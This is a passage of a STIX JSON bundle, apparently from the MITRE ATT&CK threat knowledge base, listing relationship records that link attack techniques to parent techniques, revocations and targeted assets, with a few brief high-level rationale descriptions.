"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3", "target_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3d3c5d24-be5c-42e8-98ca-3b04382df39a", "created": "2023-09-28T21:26:11.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:26:11.506Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3d784d79-7e84-4760-88d4-78039fbb4de4", "created": "2020-03-11T14:13:43.032Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720", "target_ref": "attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3d8ab290-c3fb-4a0e-aaf6-d783fccfdbb7", "created": "2023-03-30T22:45:03.539Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-03-30T22:45:03.539Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--90c4a591-d02d-490b-92aa-619d9701ac04", "target_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3db21d39-c143-4a16-adb8-a20d1115fc39", "created": "2020-03-09T17:07:57.480Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--613d08bc-e8f4-4791-80b0-c8b974340dfd", "target_ref": "attack-pattern--51ea26b1-ff1e-4faa-b1a0-1114cd298c87", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3dd15958-b159-4d01-b3c2-37bdf9b417b5", "created": "2023-09-29T17:05:08.346Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:05:08.346Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3dd34032-bef9-4dec-bed4-77b670c70453", "created": "2023-07-10T16:37:17.724Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-07-10T16:37:17.724Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--6fa224c7-5091-4595-bf15-3fc9fe2f2c7c", "target_ref": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3dd35c9a-146d-4370-80ac-69fed35d81a1", "created": "2023-09-29T16:44:16.391Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:44:16.391Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3e24f01c-3af8-4dde-9200-4f69fecb3156", "created": "2020-02-11T20:35:32.284Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--b39d03cb-7b98-41c4-a878-c40c1a913dc0", "target_ref": "attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3e2ca5c5-2e5c-4e8a-98c4-0455cea56a88", "created": "2020-02-05T15:08:06.019Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--519630c5-f03f-4882-825c-3af924935817", "target_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3ee8ef8e-c4ad-4332-b4ff-3e45d9c21f66", "created": "2024-03-29T16:59:11.210Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-03-29T16:59:11.210Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--09b008a9-b4eb-462a-a751-a0eb58050cd9", "target_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3eef17bd-57ab-4262-81a7-a5e205aba5a1", "created": "2020-01-24T20:02:59.498Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a", "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": true, "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3f07067f-0cbc-489c-8722-a33399ebd4f9", "created": "2023-09-29T17:39:42.457Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:39:42.457Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3f0bdc47-230f-4228-8d55-41023f34c305", "created": "2021-09-22T17:45:10.377Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--1bae753e-8e52-4055-a66d-2ead90303ca9", "target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3f403d71-cb42-4f08-a0f3-ea6956d35dcb", "created": "2022-02-25T15:27:45.019Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-05-24T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--a4657bc9-d22f-47d2-a7b7-dd6ec33f3dde", "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3f7f515f-25f9-4afb-becf-6247f4d6ecd2", "created": "2020-03-15T14:59:15.485Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5", "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3f92c11b-f6e2-4c07-9913-9fa7469ba4fe", "created": "2023-09-28T21:17:18.201Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:17:18.201Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3fbe092c-7029-4c31-ac96-9fd2fb13fa2c", "created": "2020-02-11T19:05:45.921Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42", "target_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3fe5844e-d197-4636-a4c4-b89b368c2597", "created": "2020-10-02T16:58:58.847Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--0979abf9-4e26-43ec-9b6e-54efc4e70fca", "target_ref": "attack-pattern--55fc4df0-b42c-479a-b860-7a6761bcaad0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3fe69c6d-6722-44ad-bab7-e34981d68daa", "created": "2023-09-28T20:27:43.727Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:27:43.727Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3ffda000-9e1b-4f63-8cc4-7b31feeb0b12", "created": "2020-03-02T19:08:18.033Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--6aac77c4-eaf2-4366-8c13-ce50ab951f38", "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4011b9e8-317f-40b9-bd3c-3fb1e99c6542", "created": "2023-09-29T18:57:32.665Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-05-28T01:30:54.102Z", "description": "Asset Mapping Rationale: Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to enable remote service abuse.", "relationship_type": "targets", "source_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4030c6bb-1f3d-4553-90d7-b984c12c5eb7", "created": "2020-01-14T01:30:41.175Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--e49ee9d2-0d98-44ef-85e5-5d3100065744", "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4059da6f-b52b-4265-8bf9-3ad6154dbde4", "created": "2023-09-29T18:05:42.611Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:05:42.611Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--40662471-6d5c-407d-8526-bb857a4d53b4", "created": "2024-05-23T04:06:53.716Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T01:33:16.625Z", "description": "Asset Mapping Rationale: Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp.", "relationship_type": "targets", "source_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--413c1c41-6ef9-413b-a75a-e67f1668b3db", "created": "2023-09-29T17:04:46.290Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:04:46.290Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4142c046-18da-4a55-8aad-84370121332d", "created": "2020-10-01T00:55:17.851Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--39cc9f64-cf74-4a48-a4d8-fe98c54a02e0", "target_ref": "attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4180422b-a478-4ceb-ac8c-6fe86c85399c", "created": "2020-03-13T21:13:10.630Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c", "target_ref": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--41a109dd-11d9-4840-a38b-088fc790f45a", "created": "2024-03-25T20:17:27.552Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-03-25T20:17:27.552Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1c5cf58c-a34a-40d7-82f4-f987cdfc2b91", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--41dbf626-b968-4b51-9f7d-aaea14d39b4d", "created": "2023-09-28T19:58:43.542Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:58:43.542Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--42c0040f-b5a0-433a-99df-92c17a336b33", "created": "2024-05-23T03:49:27.731Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-30T16:03:35.098Z", "description": "Asset Mapping Rationale: \nAdversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration. Adversaries may do this using a Network Device CLI, which have functionality to interact with the file system to gather information.", "relationship_type": "targets", "source_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--432b2dc0-52ff-488f-a5e9-c1e510fc7a0b", "created": "2023-09-28T19:58:54.450Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:58:54.450Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--43344cd7-5004-4dac-8b62-8899105fa265", "created": "2023-09-29T18:47:20.334Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:47:20.334Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4347eb2b-b33d-4e17-94f2-3701e18f0cab", "created": "2021-05-20T12:20:42.354Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--d4dc46e3-5ba5-45b9-8204-010867cacfcb", "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--43ce1828-5b95-4f88-840b-52633ec5db19", "created": "2024-05-23T04:08:59.218Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T01:40:15.354Z", "description": "Asset Mapping Rationale: Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure.", "relationship_type": "targets", "source_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4436ace7-a47d-4d18-afa1-4454432fba66", "created": "2020-01-30T14:24:35.602Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073", "target_ref": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4508bdef-9528-47ae-804c-bc59d1e694e7", "created": "2023-09-28T20:02:35.354Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:02:35.354Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--45320c5e-4aae-4e45-9aac-23f863957056", "created": "2020-03-19T20:22:02.328Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--c16e5409-ee53-4d79-afdc-4099dc9292df", "target_ref": "attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--456ff399-4925-45d4-aa84-d930eae5348e", "created": "2023-09-28T20:26:47.786Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": 